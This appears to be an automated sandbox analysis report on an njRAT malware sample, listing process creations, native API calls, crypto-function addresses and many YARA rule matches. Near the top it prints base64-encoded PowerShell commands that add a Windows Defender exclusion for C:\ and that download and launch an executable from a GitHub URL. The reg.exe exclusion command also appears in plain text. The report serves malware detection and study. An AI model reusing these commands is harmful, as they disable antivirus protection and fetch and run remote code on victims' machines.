Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc cgBlAGcAIABhAGQAZAAgACIASABLAEwATQBcAFMATwBGAFQAVwBBAFIARQBcAFAAbwBsAGkAYwBpAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAEQAZQBmAGUAbgBkAGUAcgBcAEUAeABjAGwAdQBzAGkAbwBuAHMAXABQAGEAdABoAHMAIgAgAC8AdgAgAEMAOgBcAA==	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AQQBuAG8AbgBBAG0AMAAzADYAOQAvAGEAbQAvAHIAYQB3AC8AcgBlAGYAcwAvAGgAZQBhAGQAcwAvAG0AYQBpAG4ALwBSAHUAbgB0AGkAbQBlAEIAcgBvAGsAZQByAC4AZQB4AGUAIgANAAoAJABvAHUAdABwAHUAdAAgAD0AIAAiACQAZQBuAHYAOgBUAGUAbQBwAC8AUgB1AG4AdABpAG0AZQBCAHIAbwBrAGUAcgAuAGUAeABlACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABvAHUAdABwAHUAdAANAAoAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABvAHUAdABwAHUAdAA=	Jump to behavior

Abnormal high CPU Usage

Source: C:\Users\user\AppData\Roaming\dllhost.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AF02 NtQuerySystemInformation,	15_2_00A7AF02
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00A7AED1 NtQuerySystemInformation,	15_2_00A7AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BBC72 NtSetInformationProcess,	20_2_006BBC72
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAF02 NtQuerySystemInformation,	20_2_006BAF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BAED1 NtQuerySystemInformation,	20_2_006BAED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_006BBC50 NtSetInformationProcess,	20_2_006BBC50
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AF02 NtQuerySystemInformation,	24_2_00A5AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 24_2_00A5AED1 NtQuerySystemInformation,	24_2_00A5AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AF02 NtQuerySystemInformation,	25_2_00D3AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 25_2_00D3AED1 NtQuerySystemInformation,	25_2_00D3AED1
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AF02 NtQuerySystemInformation,	26_2_0095AF02
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 26_2_0095AED1 NtQuerySystemInformation,	26_2_0095AED1

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E60EC0	15_2_00E60EC0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E615B3	15_2_00E615B3
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E61600	15_2_00E61600
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\Payload.exe	Code function: 15_2_00E60E90	15_2_00E60E90
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_00C4C1B8	16_2_00C4C1B8
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_064E8EE8	16_2_064E8EE8
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_078F09E0	16_2_078F09E0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_0797CB40	16_2_0797CB40
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_07977808	16_2_07977808
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079777F9	16_2_079777F9
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_07976738	16_2_07976738
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_0797C4A2	16_2_0797C4A2
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_07979AAF	16_2_07979AAF
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_0797DA47	16_2_0797DA47
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079BBCC0	16_2_079BBCC0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079B3BE0	16_2_079B3BE0
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079B5ADF	16_2_079B5ADF
Source: C:\Users\user\AppData\Local\Temp\MegaJoinerExtracted\webhook.exe	Code function: 16_2_079B5AF0	16_2_079B5AF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF8876A54FA	17_2_00007FF8876A54FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_00007FF8877730E9	17_2_00007FF8877730E9
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B7CEB7	20_2_00B7CEB7
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B70EC0	20_2_00B70EC0
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B73C40	20_2_00B73C40
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B70EA4	20_2_00B70EA4
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B71600	20_2_00B71600
Source: C:\Users\user\AppData\Roaming\dllhost.exe	Code function: 20_2_00B715B3	20_2_00B715B3

Sample file is different than original file name gathered from version info

Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamejoinerStub.exe6 vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000002.1457358254.0000000013560000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewebhooker2.exe6 vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000002.1503477314.000000001F18A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewscript.exe.mui` vs virus.exe.bin.exe
Source: virus.exe.bin.exe, 00000000.00000000.1431169171.0000000000E32000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejoinerStub.exe6 vs virus.exe.bin.exe

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\reg.exe "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /v C:\

Yara signature match

Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: virus.exe.bin.exe, type: SAMPLE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.3758448.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ababba.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.133459a2.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.Payload.exe.2a6fef8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.0.Payload.exe.470000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: crimeware_njrat_strings author = Sekoia.io, description = Detects njRAT based on some strings, creation_date = 2022-08-22, classification = TLP:CLEAR, version = 1.0, id = 215807ae-fbcb-478d-8941-e0787b883669
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.3758448.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 11.2.final.exe.133459a2.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 15.2.Payload.exe.2a6fef8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.1356599f.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ababba.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 0.2.virus.exe.bin.exe.1356abb7.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
Source: 2.2.Hyra.exe.12ab59a0.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
